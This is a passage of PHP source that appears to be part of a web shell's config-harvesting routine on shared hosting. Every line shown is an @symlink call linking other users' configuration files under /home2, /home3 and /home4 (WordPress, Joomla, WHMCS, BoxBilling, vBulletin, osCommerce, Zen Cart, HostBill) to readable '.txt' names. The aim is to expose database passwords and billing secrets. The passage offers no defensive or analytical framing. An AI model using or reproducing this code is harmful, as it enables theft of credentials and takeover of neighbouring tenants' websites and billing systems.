  2653. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2654. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2655. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2656. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2657. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2658. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2659. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2660. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2661. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2662. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2663. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2664. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2665. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2666. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2667. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2668. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2669. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2670. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2671. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2672. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2673. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2674. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2675. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2676. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2677. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2678. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2679. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2680. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2681. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2682. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2683. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2684. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2685. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2686. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2687. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2688. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2689. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2690.  
  2691. //Home3
  2692.  
  2693. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2694. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2695. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2696. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2697. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2698. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2699. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2700. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2701. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2702. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2703. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2704. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2705. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2706. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2707. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2708. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2709. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2710. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2711. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2712. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2713. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2714. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2715. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2716. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2717. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2718. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2719. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2720. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2721. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2722. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2723. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2724. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2725. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2726. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2727. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2728. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2729. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2730. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2731. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2732. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2733. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2734. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2735. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2736. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2737. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2738. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2739. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2740. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2741. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2742. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2743. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2744. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2745. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2746. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2747. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2748. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2749. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2750. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2751. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2752. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2753. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2754. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2755. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2756. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2757. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2758. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2759. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2760. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2761. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2762. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2763. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2764. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2765. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2766. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2767. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2768. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2769. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2770. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2771. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2772. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2773. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2774. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2775. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2776. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2777. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2778. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2779. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2780. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2781. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2782. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2783. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2784. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2785. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2786. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2787. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2788. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2789. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2790. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2791. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2792. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2793. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2794. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2795. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2796. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2797. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2798. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2799. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2800. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2801. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2802. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2803. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2804. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2805. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2806. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2807. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2808. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2809. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2810. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2811. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2812. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2813. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2814. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2815. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2816. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2817. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2818. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2819. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2820. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2821. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2822. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2823. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2824. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2825. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2826. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2827. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2828. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2829. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2830. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2831. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2832. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2833. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2834. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2835. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2836. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2837. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2838. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2839. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2840. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2841. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2842. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2843. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2844. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2845. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2846. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2847. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2848. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2849. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2850. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2851. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2852. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2853. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2854. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2855. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2856. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2857. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2858. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2859. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2860. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2861. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2862. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2863. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2864. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2865. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2866. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2867. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2868. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2869. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2870. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2871. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2872. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2873.  
  2874. //Home4
  2875.  
  2876. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2877. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2878. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2879. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2880. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2881. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2882. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2883. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2884. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2885. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2886. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2887. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2888. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2889. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2890. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2891. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2892. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2893. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2894. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2895. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2896. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2897. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2898. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2899. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2900. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2901. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2902. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2903. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2904. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2905. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2906. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2907. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2908. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2909. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2910. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2911. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2912. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2913. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2914. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2915. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2916. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2917. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2918. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2919. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2920. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2921. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2922. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2923. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2924. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2925. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2926. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2927. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2928. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2929. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2930. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2931. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2932. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2933. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2934. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2935. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2936. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2937. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2938. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2939. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2940. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2941. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2942. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2943. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2944. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2945. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2946. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2947. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2948. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2949. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2950. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2951. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2952. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2953. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2954. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2955. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2956. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2957. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2958. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2959. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2960. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
